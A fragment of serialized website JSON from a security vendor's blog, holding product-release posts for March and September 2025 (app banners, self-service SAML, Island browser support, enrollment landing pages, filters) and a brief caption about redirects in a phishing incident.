common.",{"url":82795,"width":5358,"height":11942},"https://images.ctfassets.net/y1cdw1ablpvd/4yiniKsw5THFJNG7djVUmp/4fc66a46477fe249a5506521dd80d4a2/image1.png",{"sys":82797,"__typename":5345,"title":80163,"caption":80163,"layoutMode":118,"file":82798},{"id":59074},{"url":80165,"width":5358,"height":11942},{"sys":82800,"__typename":5345,"title":82801,"caption":82802,"layoutMode":118,"file":82803},{"id":59087},"Phishing incident timeline","A large number of redirects were used across different sites to obfuscate the phishing link and prevent the phishing URL being linked to the original URL delivered to the victim.",{"url":82804,"width":82805,"height":82806},"https://images.ctfassets.net/y1cdw1ablpvd/6Xbed976bd7yltgfbAp9GK/3a040bf988330617690d53716fe3bd7a/Frame_627926__2_.png",3660,4200,{"sys":82808,"__typename":15269,"type":15270,"ctaText":49208,"buttonLabel":15277,"buttonColour":15273,"buttonUrl":49143},{"id":8590},"content:blog:how-push-stopped-a-high-risk-linkedin-spear-phishing-attack.json","blog/how-push-stopped-a-high-risk-linkedin-spear-phishing-attack.json","blog/how-push-stopped-a-high-risk-linkedin-spear-phishing-attack",{"_path":82813,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":82814,"ogImage":118,"summary":82816,"title":65595,"subtitle":118,"metaTitle":82827,"synopsis":65596,"hashTags":118,"publishedDate":59482,"slug":65597,"tagsCollection":82828,"relatedBlogPostsCollection":82832,"authorsCollection":83763,"content":83767,"_id":84293,"_type":5439,"_source":5440,"_file":84294,"_stem":84295,"_extension":5439},"/blog/product-release-september-2025",{"id":65055,"publishedAt":82815},"2025-09-08T15:31:19.929Z",{"json":82817},{"data":82818,"content":82819,"nodeType":165},{},[82820],{"data":82821,"content":82822,"nodeType":178},{},[82823],{"data":82824,"marks":82825,"value":82826,"nodeType":173},{},[],"Attack timeline, screenshots & classifications for Detections, blog cloned login pages, and more.","Push Security new product features for September 2025",{"items":82829},[82830],{"sys":82831,"name":18399},{"id":18398},{"items":82833},[82834,83264],{"__typename":1528,"sys":82835,"content":82836,"title":66077,"synopsis":66078,"hashTags":118,"publishedDate":66079,"slug":66080,"tagsCollection":83256,"authorsCollection":83260},{"id":65608},{"json":82837},{"data":82838,"content":82839,"nodeType":165},{},[82840,82846,82912,82918,82931,82937,82942,82959,82965,82978,82984,82990,83010,83015,83021,83034,83040,83045,83062,83068,83081,83087,83093,83098,83115,83121,83134,83140,83145,83160,83166,83193,83206,83211,83226,83232,83245,83250],{"data":82841,"content":82842,"nodeType":169},{},[82843],{"data":82844,"marks":82845,"value":18415,"nodeType":173},{},[],{"data":82847,"content":82848,"nodeType":250},{},[82849,82858,82867,82876,82885,82894,82903],{"data":82850,"content":82851,"nodeType":254},{},[82852],{"data":82853,"content":82854,"nodeType":178},{},[82855],{"data":82856,"marks":82857,"value":65631,"nodeType":173},{},[],{"data":82859,"content":82860,"nodeType":254},{},[82861],{"data":82862,"content":82863,"nodeType":178},{},[82864],{"data":82865,"marks":82866,"value":65641,"nodeType":173},{},[],{"data":82868,"content":82869,"nodeType":254},{},[82870],{"data":82871,"content":82872,"nodeType":178},{},[82873],{"data":82874,"marks":82875,"value":65651,"nodeType":173},{},[],{"data":82877,"content":82878,"nodeType":254},{},[82879],{"data":82880,"content":82881,"nodeType":178},{},[82882],{"data":82883,"marks":82884,"value":65661,"nodeType":173},{},[],{"data":82886,"content":82887,"nodeType":254},{},[82888],{"data":82889,"content":82890,"nodeType":178},{},[82891],{"data":82892,"marks":82893,"value":65671,"nodeType":173},{},[],{"data":82895,"content":82896,"nodeType":254},{},[82897],{"data":82898,"content":82899,"nodeType":178},{},[82900],{"data":82901,"marks":82902,"value":65681,"nodeType":173},{},[],{"data":82904,"content":82905,"nodeType":254},{},[82906],{"data":82907,"content":82908,"nodeType":178},{},[82909],{"data":82910,"marks":82911,"value":65691,"nodeType":173},{},[],{"data":82913,"content":82914,"nodeType":169},{},[82915],{"data":82916,"marks":82917,"value":65631,"nodeType":173},{},[],{"data":82919,"content":82920,"nodeType":178},{},[82921,82924,82928],{"data":82922,"marks":82923,"value":65704,"nodeType":173},{},[],{"data":82925,"marks":82926,"value":65709,"nodeType":173},{},[82927],{"type":370},{"data":82929,"marks":82930,"value":65713,"nodeType":173},{},[],{"data":82932,"content":82933,"nodeType":178},{},[82934],{"data":82935,"marks":82936,"value":65720,"nodeType":173},{},[],{"data":82938,"content":82941,"nodeType":312},{"target":82939},{"sys":82940},{"id":65725,"type":317,"linkType":318},[],{"data":82943,"content":82944,"nodeType":178},{},[82945,82948,82956],{"data":82946,"marks":82947,"value":37,"nodeType":173},{},[],{"data":82949,"content":82952,"nodeType":1698},{"target":82950},{"sys":82951},{"id":65737,"type":317,"linkType":318},[82953],{"data":82954,"marks":82955,"value":18605,"nodeType":173},{},[],{"data":82957,"marks":82958,"value":37,"nodeType":173},{},[],{"data":82960,"content":82961,"nodeType":169},{},[82962],{"data":82963,"marks":82964,"value":65641,"nodeType":173},{},[],{"data":82966,"content":82967,"nodeType":178},{},[82968,82971,82975],{"data":82969,"marks":82970,"value":65757,"nodeType":173},{},[],{"data":82972,"marks":82973,"value":65762,"nodeType":173},{},[82974],{"type":370},{"data":82976,"marks":82977,"value":65766,"nodeType":173},{},[],{"data":82979,"content":82980,"nodeType":178},{},[82981],{"data":82982,"marks":82983,"value":65773,"nodeType":173},{},[],{"data":82985,"content":82986,"nodeType":178},{},[82987],{"data":82988,"marks":82989,"value":65780,"nodeType":173},{},[],{"data":82991,"content":82992,"nodeType":178},{},[82993,82996,83000,83003,83007],{"data":82994,"marks":82995,"value":65787,"nodeType":173},{},[],{"data":82997,"marks":82998,"value":2789,"nodeType":173},{},[82999],{"type":370},{"data":83001,"marks":83002,"value":65795,"nodeType":173},{},[],{"data":83004,"marks":83005,"value":65800,"nodeType":173},{},[83006],{"type":370},{"data":83008,"marks":83009,"value":65804,"nodeType":173},{},[],{"data":83011,"content":83014,"nodeType":312},{"target":83012},{"sys":83013},{"id":25101,"type":317,"linkType":318},[],{"data":83016,"content":83017,"nodeType":169},{},[83018],{"data":83019,"marks":83020,"value":65651,"nodeType":173},{},[],{"data":83022,"content":83023,"nodeType":178},{},[83024,83027,83031],{"data":83025,"marks":83026,"value":65822,"nodeType":173},{},[],{"data":83028,"marks":83029,"value":2578,"nodeType":173},{},[83030],{"type":370},{"data":83032,"marks":83033,"value":2340,"nodeType":173},{},[],{"data":83035,"content":83036,"nodeType":178},{},[83037],{"data":83038,"marks":83039,"value":65836,"nodeType":173},{},[],{"data":83041,"content":83044,"nodeType":312},{"target":83042},{"sys":83043},{"id":65841,"type":317,"linkType":318},[],{"data":83046,"content":83047,"nodeType":178},{},[83048,83051,83059],{"data":83049,"marks":83050,"value":37,"nodeType":173},{},[],{"data":83052,"content":83055,"nodeType":1698},{"target":83053},{"sys":83054},{"id":2442,"type":317,"linkType":318},[83056],{"data":83057,"marks":83058,"value":18605,"nodeType":173},{},[],{"data":83060,"marks":83061,"value":37,"nodeType":173},{},[],{"data":83063,"content":83064,"nodeType":169},{},[83065],{"data":83066,"marks":83067,"value":65661,"nodeType":173},{},[],{"data":83069,"content":83070,"nodeType":178},{},[83071,83074,83078],{"data":83072,"marks":83073,"value":65872,"nodeType":173},{},[],{"data":83075,"marks":83076,"value":65877,"nodeType":173},{},[83077],{"type":370},{"data":83079,"marks":83080,"value":65881,"nodeType":173},{},[],{"data":83082,"content":83083,"nodeType":178},{},[83084],{"data":83085,"marks":83086,"value":65888,"nodeType":173},{},[],{"data":83088,"content":83089,"nodeType":178},{},[83090],{"data":83091,"marks":83092,"value":65895,"nodeType":173},{},[],{"data":83094,"content":83097,"nodeType":312},{"target":83095},{"sys":83096},{"id":65900,"type":317,"linkType":318},[],{"data":83099,"content":83100,"nodeType":178},{},[83101,83104,83112],{"data":83102,"marks":83103,"value":37,"nodeType":173},{},[],{"data":83105,"content":83108,"nodeType":1698},{"target":83106},{"sys":83107},{"id":65912,"type":317,"linkType":318},[83109],{"data":83110,"marks":83111,"value":18605,"nodeType":173},{},[],{"data":83113,"marks":83114,"value":37,"nodeType":173},{},[],{"data":83116,"content":83117,"nodeType":169},{},[83118],{"data":83119,"marks":83120,"value":65671,"nodeType":173},{},[],{"data":83122,"content":83123,"nodeType":178},{},[83124,83127,83131],{"data":83125,"marks":83126,"value":65284,"nodeType":173},{},[],{"data":83128,"marks":83129,"value":65936,"nodeType":173},{},[83130],{"type":370},{"data":83132,"marks":83133,"value":65940,"nodeType":173},{},[],{"data":83135,"content":83136,"nodeType":178},{},[83137],{"data":83138,"marks":83139,"value":65947,"nodeType":173},{},[],{"data":83141,"content":83144,"nodeType":312},{"target":83142},{"sys":83143},{"id":65952,"type":317,"linkType":318},[],{"data":83146,"content":83147,"nodeType":178},{},[83148,83151,83157],{"data":83149,"marks":83150,"value":37,"nodeType":173},{},[],{"data":83152,"content":83153,"nodeType":186},{"uri":65962},[83154],{"data":83155,"marks":83156,"value":18605,"nodeType":173},{},[],{"data":83158,"marks":83159,"value":37,"nodeType":173},{},[],{"data":83161,"content":83162,"nodeType":169},{},[83163],{"data":83164,"marks":83165,"value":65681,"nodeType":173},{},[],{"data":83167,"content":83168,"nodeType":178},{},[83169,83172,83176,83179,83183,83186,83190],{"data":83170,"marks":83171,"value":65982,"nodeType":173},{},[],{"data":83173,"marks":83174,"value":65987,"nodeType":173},{},[83175],{"type":370},{"data":83177,"marks":83178,"value":65991,"nodeType":173},{},[],{"data":83180,"marks":83181,"value":65996,"nodeType":173},{},[83182],{"type":370},{"data":83184,"marks":83185,"value":933,"nodeType":173},{},[],{"data":83187,"marks":83188,"value":2570,"nodeType":173},{},[83189],{"type":370},{"data":83191,"marks":83192,"value":2340,"nodeType":173},{},[],{"data":83194,"content":83195,"nodeType":178},{},[83196,83199,83203],{"data":83197,"marks":83198,"value":66013,"nodeType":173},{},[],{"data":83200,"marks":83201,"value":19371,"nodeType":173},{},[83202],{"type":370},{"data":83204,"marks":83205,"value":66021,"nodeType":173},{},[],{"data":83207,"content":83210,"nodeType":312},{"target":83208},{"sys":83209},{"id":66026,"type":317,"linkType":318},[],{"data":83212,"content":83213,"nodeType":178},{},[83214,83217,83223],{"data":83215,"marks":83216,"value":37,"nodeType":173},{},[],{"data":83218,"content":83219,"nodeType":186},{"uri":66036},[83220],{"data":83221,"marks":83222,"value":18605,"nodeType":173},{},[],{"data":83224,"marks":83225,"value":37,"nodeType":173},{},[],{"data":83227,"content":83228,"nodeType":169},{},[83229],{"data":83230,"marks":83231,"value":65691,"nodeType":173},{},[],{"data":83233,"content":83234,"nodeType":178},{},[83235,83238,83242],{"data":83236,"marks":83237,"value":66056,"nodeType":173},{},[],{"data":83239,"marks":83240,"value":65573,"nodeType":173},{},[83241],{"type":370},{"data":83243,"marks":83244,"value":66064,"nodeType":173},{},[],{"data":83246,"content":83249,"nodeType":312},{"target":83247},{"sys":83248},{"id":66069,"type":317,"linkType":318},[],{"data":83251,"content":83252,"nodeType":178},{},[83253],{"data":83254,"marks":83255,"value":37,"nodeType":173},{},[],{"items":83257},[83258],{"sys":83259,"name":18399},{"id":18398},{"items":83261},[83262],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":83263},{"url":19129},{"__typename":1528,"sys":83265,"content":83267,"title":83751,"synopsis":83752,"hashTags":118,"publishedDate":83753,"slug":83754,"tagsCollection":83755,"authorsCollection":83759},{"id":83266},"4Aln4tyCmoffCEg6yiUO4J",{"json":83268},{"data":83269,"content":83270,"nodeType":165},{},[83271,83277,83330,83336,83351,83358,83427,83433,83451,83458,83474,83489,83495,83502,83520,83527,83542,83557,83564,83582,83589,83613,83620,83636,83642,83658,83696,83739,83745],{"data":83272,"content":83273,"nodeType":169},{},[83274],{"data":83275,"marks":83276,"value":18415,"nodeType":173},{},[],{"data":83278,"content":83279,"nodeType":250},{},[83280,83290,83300,83310,83320],{"data":83281,"content":83282,"nodeType":254},{},[83283],{"data":83284,"content":83285,"nodeType":178},{},[83286],{"data":83287,"marks":83288,"value":83289,"nodeType":173},{},[],"Add app banners to custom URLs",{"data":83291,"content":83292,"nodeType":254},{},[83293],{"data":83294,"content":83295,"nodeType":178},{},[83296],{"data":83297,"marks":83298,"value":83299,"nodeType":173},{},[],"Self-service SAML for the Push platform",{"data":83301,"content":83302,"nodeType":254},{},[83303],{"data":83304,"content":83305,"nodeType":178},{},[83306],{"data":83307,"marks":83308,"value":83309,"nodeType":173},{},[],"Support for Island enterprise browser",{"data":83311,"content":83312,"nodeType":254},{},[83313],{"data":83314,"content":83315,"nodeType":178},{},[83316],{"data":83317,"marks":83318,"value":83319,"nodeType":173},{},[],"Landing page browser enrollment option",{"data":83321,"content":83322,"nodeType":254},{},[83323],{"data":83324,"content":83325,"nodeType":178},{},[83326],{"data":83327,"marks":83328,"value":83329,"nodeType":173},{},[],"Improved filters for apps, accounts, and more",{"data":83331,"content":83332,"nodeType":169},{},[83333],{"data":83334,"marks":83335,"value":83289,"nodeType":173},{},[],{"data":83337,"content":83338,"nodeType":178},{},[83339,83342,83347],{"data":83340,"marks":83341,"value":65284,"nodeType":173},{},[],{"data":83343,"marks":83344,"value":83346,"nodeType":173},{},[83345],{"type":370},"add app banners to a custom-defined URL or URL pattern",{"data":83348,"marks":83349,"value":83350,"nodeType":173},{},[],". Previously, app banners displayed only on login and signup pages for configured apps. With this update, you can put them on any page you like. ",{"data":83352,"content":83353,"nodeType":178},{},[83354],{"data":83355,"marks":83356,"value":83357,"nodeType":173},{},[],"That means you can:",{"data":83359,"content":83360,"nodeType":250},{},[83361,83380,83398,83417],{"data":83362,"content":83363,"nodeType":254},{},[83364],{"data":83365,"content":83366,"nodeType":178},{},[83367,83371,83376],{"data":83368,"marks":83369,"value":83370,"nodeType":173},{},[],"Remind employees ",{"data":83372,"marks":83373,"value":83375,"nodeType":173},{},[83374],{"type":370},"not to store credentials",{"data":83377,"marks":83378,"value":83379,"nodeType":173},{},[]," or sensitive information on internal wikis.",{"data":83381,"content":83382,"nodeType":254},{},[83383],{"data":83384,"content":83385,"nodeType":178},{},[83386,83390,83395],{"data":83387,"marks":83388,"value":83389,"nodeType":173},{},[],"Require acknowledgement of your security policies when using ",{"data":83391,"marks":83392,"value":83394,"nodeType":173},{},[83393],{"type":370},"high-value GitHub repos",{"data":83396,"marks":83397,"value":1477,"nodeType":173},{},[],{"data":83399,"content":83400,"nodeType":254},{},[83401],{"data":83402,"content":83403,"nodeType":178},{},[83404,83408,83413],{"data":83405,"marks":83406,"value":83407,"nodeType":173},{},[],"Ask employees not to share sensitive information when using ",{"data":83409,"marks":83410,"value":83412,"nodeType":173},{},[83411],{"type":370},"GenAI tools",{"data":83414,"marks":83415,"value":83416,"nodeType":173},{},[]," during an unauthenticated session.",{"data":83418,"content":83419,"nodeType":254},{},[83420],{"data":83421,"content":83422,"nodeType":178},{},[83423],{"data":83424,"marks":83425,"value":83426,"nodeType":173},{},[],"Or anything else you can think of!",{"data":83428,"content":83432,"nodeType":312},{"target":83429},{"sys":83430},{"id":83431,"type":317,"linkType":318},"6Jq3wMNCf1ns8zH6Z8tvGX",[],{"data":83434,"content":83435,"nodeType":178},{},[83436,83439,83448],{"data":83437,"marks":83438,"value":37,"nodeType":173},{},[],{"data":83440,"content":83444,"nodeType":1698},{"target":83441},{"sys":83442},{"id":83443,"type":317,"linkType":318},"2ti5f4Eh4teqnVkKDgztcm",[83445],{"data":83446,"marks":83447,"value":18605,"nodeType":173},{},[],{"data":83449,"marks":83450,"value":37,"nodeType":173},{},[],{"data":83452,"content":83453,"nodeType":169},{},[83454],{"data":83455,"marks":83456,"value":83457,"nodeType":173},{},[],"Self-service SAML for the Push admin console",{"data":83459,"content":83460,"nodeType":178},{},[83461,83465,83470],{"data":83462,"marks":83463,"value":83464,"nodeType":173},{},[],"It’s now ",{"data":83466,"marks":83467,"value":83469,"nodeType":173},{},[83468],{"type":370},"easier to set up SAML for the Push admin console",{"data":83471,"marks":83472,"value":83473,"nodeType":173},{},[]," so your Push admins can log in using your SSO provider, such as Okta or Microsoft Entra ID. Once you’ve created the Push app in your identity provider, you can manage admin access via your IdP.",{"data":83475,"content":83476,"nodeType":178},{},[83477,83481,83485],{"data":83478,"marks":83479,"value":83480,"nodeType":173},{},[],"You can set up SAML yourself from the admin console by going to the ",{"data":83482,"marks":83483,"value":2789,"nodeType":173},{},[83484],{"type":370},{"data":83486,"marks":83487,"value":83488,"nodeType":173},{},[]," page and following the steps in the setup wizard.",{"data":83490,"content":83494,"nodeType":312},{"target":83491},{"sys":83492},{"id":83493,"type":317,"linkType":318},"23nEc3hEVCjENod1xpLW97",[],{"data":83496,"content":83497,"nodeType":178},{},[83498],{"data":83499,"marks":83500,"value":83501,"nodeType":173},{},[],"SAML for the Push platform is available at no additional cost.",{"data":83503,"content":83504,"nodeType":178},{},[83505,83508,83517],{"data":83506,"marks":83507,"value":37,"nodeType":173},{},[],{"data":83509,"content":83513,"nodeType":1698},{"target":83510},{"sys":83511},{"id":83512,"type":317,"linkType":318},"2SRHVwdI7xMYdyrMifgqog",[83514],{"data":83515,"marks":83516,"value":18605,"nodeType":173},{},[],{"data":83518,"marks":83519,"value":37,"nodeType":173},{},[],{"data":83521,"content":83522,"nodeType":169},{},[83523],{"data":83524,"marks":83525,"value":83526,"nodeType":173},{},[],"Push now supports Island enterprise browser",{"data":83528,"content":83529,"nodeType":178},{},[83530,83533,83538],{"data":83531,"marks":83532,"value":65284,"nodeType":173},{},[],{"data":83534,"marks":83535,"value":83537,"nodeType":173},{},[83536],{"type":370},"install the Push browser agent on Island",{"data":83539,"marks":83540,"value":83541,"nodeType":173},{},[],", adding a powerful, complementary set of identity security controls to the enterprise browser.",{"data":83543,"content":83544,"nodeType":178},{},[83545,83549,83554],{"data":83546,"marks":83547,"value":83548,"nodeType":173},{},[],"With Island, you can deploy and activate the Push agent seamlessly ",{"data":83550,"marks":83551,"value":83553,"nodeType":173},{},[83552],{"type":370},"without any end-user interaction",{"data":83555,"marks":83556,"value":1477,"nodeType":173},{},[],{"data":83558,"content":83559,"nodeType":178},{},[83560],{"data":83561,"marks":83562,"value":83563,"nodeType":173},{},[],"Push already provides managed deployment support for other major browsers, including Chrome, Edge, Firefox, Brave, Safari, and Arc. ",{"data":83565,"content":83566,"nodeType":178},{},[83567,83570,83579],{"data":83568,"marks":83569,"value":37,"nodeType":173},{},[],{"data":83571,"content":83575,"nodeType":1698},{"target":83572},{"sys":83573},{"id":83574,"type":317,"linkType":318},"3mUYngymmVLnXaRZSmii5Q",[83576],{"data":83577,"marks":83578,"value":18605,"nodeType":173},{},[],{"data":83580,"marks":83581,"value":37,"nodeType":173},{},[],{"data":83583,"content":83584,"nodeType":169},{},[83585],{"data":83586,"marks":83587,"value":83588,"nodeType":173},{},[],"New landing page browser enrollment option",{"data":83590,"content":83591,"nodeType":178},{},[83592,83596,83601,83605,83610],{"data":83593,"marks":83594,"value":83595,"nodeType":173},{},[],"As an alternative to Push’s email self-enrollment option for end-users, you can now invite employees to ",{"data":83597,"marks":83598,"value":83600,"nodeType":173},{},[83599],{"type":370},"self-enroll and install the Push browser extension",{"data":83602,"marks":83603,"value":83604,"nodeType":173},{},[]," themselves by directing them to a ",{"data":83606,"marks":83607,"value":83609,"nodeType":173},{},[83608],{"type":370},"landing page",{"data":83611,"marks":83612,"value":2340,"nodeType":173},{},[],{"data":83614,"content":83615,"nodeType":178},{},[83616],{"data":83617,"marks":83618,"value":83619,"nodeType":173},{},[],"Once employees visit the page, they’ll be prompted to verify their identity via OIDC login using your identity provider. Once confirmed, they’ll be prompted to install the Push extension and enrolled in Push.",{"data":83621,"content":83622,"nodeType":178},{},[83623,83626,83633],{"data":83624,"marks":83625,"value":37,"nodeType":173},{},[],{"data":83627,"content":83629,"nodeType":186},{"uri":83628},"/help/audience/administrators/docs/install-the-browser-extension/#self-enrollment-via-landing-page",[83630],{"data":83631,"marks":83632,"value":18605,"nodeType":173},{},[],{"data":83634,"marks":83635,"value":37,"nodeType":173},{},[],{"data":83637,"content":83638,"nodeType":169},{},[83639],{"data":83640,"marks":83641,"value":83329,"nodeType":173},{},[],{"data":83643,"content":83644,"nodeType":178},{},[83645,83649,83654],{"data":83646,"marks":83647,"value":83648,"nodeType":173},{},[],"We’ve improved the ",{"data":83650,"marks":83651,"value":83653,"nodeType":173},{},[83652],{"type":370},"visibility and function of filters",{"data":83655,"marks":83656,"value":83657,"nodeType":173},{},[]," on pages in the Push admin console that help you explore and manage employees, apps, and accounts. You can also pin the filters you use the most and Push will remember your selection.",{"data":83659,"content":83660,"nodeType":178},{},[83661,83665,83670,83673,83677,83680,83684,83687,83692],{"data":83662,"marks":83663,"value":83664,"nodeType":173},{},[],"You’ll find the new filters under the keyword search on all the data tables in Push, including the ",{"data":83666,"marks":83667,"value":83669,"nodeType":173},{},[83668],{"type":370},"Employees",{"data":83671,"marks":83672,"value":2936,"nodeType":173},{},[],{"data":83674,"marks":83675,"value":71552,"nodeType":173},{},[83676],{"type":370},{"data":83678,"marks":83679,"value":2936,"nodeType":173},{},[],{"data":83681,"marks":83682,"value":71581,"nodeType":173},{},[83683],{"type":370},{"data":83685,"marks":83686,"value":9534,"nodeType":173},{},[],{"data":83688,"marks":83689,"value":83691,"nodeType":173},{},[83690],{"type":370},"OAuth apps",{"data":83693,"marks":83694,"value":83695,"nodeType":173},{},[]," pages. Combine multiple filters to pinpoint useful data trends, such as:",{"data":83697,"content":83698,"nodeType":250},{},[83699,83709,83719,83729],{"data":83700,"content":83701,"nodeType":254},{},[83702],{"data":83703,"content":83704,"nodeType":178},{},[83705],{"data":83706,"marks":83707,"value":83708,"nodeType":173},{},[],"Which accounts are accessing SAML apps using passwords.",{"data":83710,"content":83711,"nodeType":254},{},[83712],{"data":83713,"content":83714,"nodeType":178},{},[83715],{"data":83716,"marks":83717,"value":83718,"nodeType":173},{},[],"Which accounts are using verified stolen credentials.",{"data":83720,"content":83721,"nodeType":254},{},[83722],{"data":83723,"content":83724,"nodeType":178},{},[83725],{"data":83726,"marks":83727,"value":83728,"nodeType":173},{},[],"Which employees do not have the Push browser extension.",{"data":83730,"content":83731,"nodeType":254},{},[83732],{"data":83733,"content":83734,"nodeType":178},{},[83735],{"data":83736,"marks":83737,"value":83738,"nodeType":173},{},[],"And many more.",{"data":83740,"content":83744,"nodeType":312},{"target":83741},{"sys":83742},{"id":83743,"type":317,"linkType":318},"OAXAnXKt4TcLOlUpdQP3X",[],{"data":83746,"content":83747,"nodeType":178},{},[83748],{"data":83749,"marks":83750,"value":37,"nodeType":173},{},[],"Product release: March 2025","Here’s what’s new on the Push platform for March 2025.","2025-03-11T00:00:00.000Z","product-release-march-2025",{"items":83756},[83757],{"sys":83758,"name":18399},{"id":18398},{"items":83760},[83761],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":83762},{"url":19129},{"items":83764},[83765],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":83766},{"url":19129},{"json":83768,"links":84249},{"data":83769,"content":83770,"nodeType":165},{},[83771,83777,83843,83849,83862,83904,83938,83943,83960,83966,83986,84010,84015,84032,84038,84044,84050,84070,84087,84093,84106,84112,84153,84158,84164,84170,84183,84200,84206,84212,84232],{"data":83772,"content":83773,"nodeType":169},{},[83774],{"data":83775,"marks":83776,"value":65066,"nodeType":173},{},[],{"data":83778,"content":83779,"nodeType":250},{},[83780,83789,83798,83807,83816,83825,83834],{"data":83781,"content":83782,"nodeType":254},{},[83783],{"data":83784,"content":83785,"nodeType":178},{},[83786],{"data":83787,"marks":83788,"value":65079,"nodeType":173},{},[],{"data":83790,"content":83791,"nodeType":254},{},[83792],{"data":83793,"content":83794,"nodeType":178},{},[83795],{"data":83796,"marks":83797,"value":65089,"nodeType":173},{},[],{"data":83799,"content":83800,"nodeType":254},{},[83801],{"data":83802,"content":83803,"nodeType":178},{},[83804],{"data":83805,"marks":83806,"value":65099,"nodeType":173},{},[],{"data":83808,"content":83809,"nodeType":254},{},[83810],{"data":83811,"content":83812,"nodeType":178},{},[83813],{"data":83814,"marks":83815,"value":65109,"nodeType":173},{},[],{"data":83817,"content":83818,"nodeType":254},{},[83819],{"data":83820,"content":83821,"nodeType":178},{},[83822],{"data":83823,"marks":83824,"value":65119,"nodeType":173},{},[],{"data":83826,"content":83827,"nodeType":254},{},[83828],{"data":83829,"content":83830,"nodeType":178},{},[83831],{"data":83832,"marks":83833,"value":65129,"nodeType":173},{},[],{"data":83835,"content":83836,"nodeType":254},{},[83837],{"data":83838,"content":83839,"nodeType":178},{},[83840],{"data":83841,"marks":83842,"value":65139,"nodeType":173},{},[],{"data":83844,"content":83845,"nodeType":169},{},[83846],{"data":83847,"marks":83848,"value":65079,"nodeType":173},{},[],{"data":83850,"content":83851,"nodeType":178},{},[83852,83855,83859],{"data":83853,"marks":83854,"value":65152,"nodeType":173},{},[],{"data":83856,"marks":83857,"value":19231,"nodeType":173},{},[83858],{"type":370},{"data":83860,"marks":83861,"value":39946,"nodeType":173},{},[],{"data":83863,"content":83864,"nodeType":250},{},[83865,83878,83891],{"data":83866,"content":83867,"nodeType":254},{},[83868],{"data":83869,"content":83870,"nodeType":178},{},[83871,83875],{"data":83872,"marks":83873,"value":65173,"nodeType":173},{},[83874],{"type":370},{"data":83876,"marks":83877,"value":65177,"nodeType":173},{},[],{"data":83879,"content":83880,"nodeType":254},{},[83881],{"data":83882,"content":83883,"nodeType":178},{},[83884,83888],{"data":83885,"marks":83886,"value":65188,"nodeType":173},{},[83887],{"type":370},{"data":83889,"marks":83890,"value":65192,"nodeType":173},{},[],{"data":83892,"content":83893,"nodeType":254},{},[83894],{"data":83895,"content":83896,"nodeType":178},{},[83897,83901],{"data":83898,"marks":83899,"value":65203,"nodeType":173},{},[83900],{"type":370},{"data":83902,"marks":83903,"value":65207,"nodeType":173},{},[],{"data":83905,"content":83906,"nodeType":178},{},[83907,83910,83914,83917,83921,83924,83928,83931,83935],{"data":83908,"marks":83909,"value":65214,"nodeType":173},{},[],{"data":83911,"marks":83912,"value":65219,"nodeType":173},{},[83913],{"type":370},{"data":83915,"marks":83916,"value":2936,"nodeType":173},{},[],{"data":83918,"marks":83919,"value":65227,"nodeType":173},{},[83920],{"type":370},{"data":83922,"marks":83923,"value":65231,"nodeType":173},{},[],{"data":83925,"marks":83926,"value":65236,"nodeType":173},{},[83927],{"type":370},{"data":83929,"marks":83930,"value":65240,"nodeType":173},{},[],{"data":83932,"marks":83933,"value":65245,"nodeType":173},{},[83934],{"type":370},{"data":83936,"marks":83937,"value":1477,"nodeType":173},{},[],{"data":83939,"content":83942,"nodeType":312},{"target":83940},{"sys":83941},{"id":65253,"type":317,"linkType":318},[],{"data":83944,"content":83945,"nodeType":178},{},[83946,83949,83957],{"data":83947,"marks":83948,"value":37,"nodeType":173},{},[],{"data":83950,"content":83953,"nodeType":1698},{"target":83951},{"sys":83952},{"id":24428,"type":317,"linkType":318},[83954],{"data":83955,"marks":83956,"value":18605,"nodeType":173},{},[],{"data":83958,"marks":83959,"value":37,"nodeType":173},{},[],{"data":83961,"content":83962,"nodeType":169},{},[83963],{"data":83964,"marks":83965,"value":65089,"nodeType":173},{},[],{"data":83967,"content":83968,"nodeType":178},{},[83969,83972,83976,83979,83983],{"data":83970,"marks":83971,"value":65284,"nodeType":173},{},[],{"data":83973,"marks":83974,"value":2740,"nodeType":173},{},[83975],{"type":370},{"data":83977,"marks":83978,"value":1464,"nodeType":173},{},[],{"data":83980,"marks":83981,"value":2748,"nodeType":173},{},[83982],{"type":370},{"data":83984,"marks":83985,"value":65299,"nodeType":173},{},[],{"data":83987,"content":83988,"nodeType":178},{},[83989,83993,83996,84000,84003,84007],{"data":83990,"marks":83991,"value":24353,"nodeType":173},{},[83992],{"type":370},{"data":83994,"marks":83995,"value":65310,"nodeType":173},{},[],{"data":83997,"marks":83998,"value":18649,"nodeType":173},{},[83999],{"type":370},{"data":84001,"marks":84002,"value":65318,"nodeType":173},{},[],{"data":84004,"marks":84005,"value":2748,"nodeType":173},{},[84006],{"type":370},{"data":84008,"marks":84009,"value":65326,"nodeType":173},{},[],{"data":84011,"content":84014,"nodeType":312},{"target":84012},{"sys":84013},{"id":65331,"type":317,"linkType":318},[],{"data":84016,"content":84017,"nodeType":178},{},[84018,84021,84029],{"data":84019,"marks":84020,"value":37,"nodeType":173},{},[],{"data":84022,"content":84025,"nodeType":1698},{"target":84023},{"sys":84024},{"id":2171,"type":317,"linkType":318},[84026],{"data":84027,"marks":84028,"value":18605,"nodeType":173},{},[],{"data":84030,"marks":84031,"value":37,"nodeType":173},{},[],{"data":84033,"content":84034,"nodeType":169},{},[84035],{"data":84036,"marks":84037,"value":65109,"nodeType":173},{},[],{"data":84039,"content":84040,"nodeType":178},{},[84041],{"data":84042,"marks":84043,"value":65362,"nodeType":173},{},[],{"data":84045,"content":84046,"nodeType":178},{},[84047],{"data":84048,"marks":84049,"value":65369,"nodeType":173},{},[],{"data":84051,"content":84052,"nodeType":178},{},[84053,84056,84060,84063,84067],{"data":84054,"marks":84055,"value":65376,"nodeType":173},{},[],{"data":84057,"marks":84058,"value":65381,"nodeType":173},{},[84059],{"type":370},{"data":84061,"marks":84062,"value":65385,"nodeType":173},{},[],{"data":84064,"marks":84065,"value":18547,"nodeType":173},{},[84066],{"type":370},{"data":84068,"marks":84069,"value":65393,"nodeType":173},{},[],{"data":84071,"content":84072,"nodeType":178},{},[84073,84076,84084],{"data":84074,"marks":84075,"value":37,"nodeType":173},{},[],{"data":84077,"content":84080,"nodeType":1698},{"target":84078},{"sys":84079},{"id":65404,"type":317,"linkType":318},[84081],{"data":84082,"marks":84083,"value":18605,"nodeType":173},{},[],{"data":84085,"marks":84086,"value":37,"nodeType":173}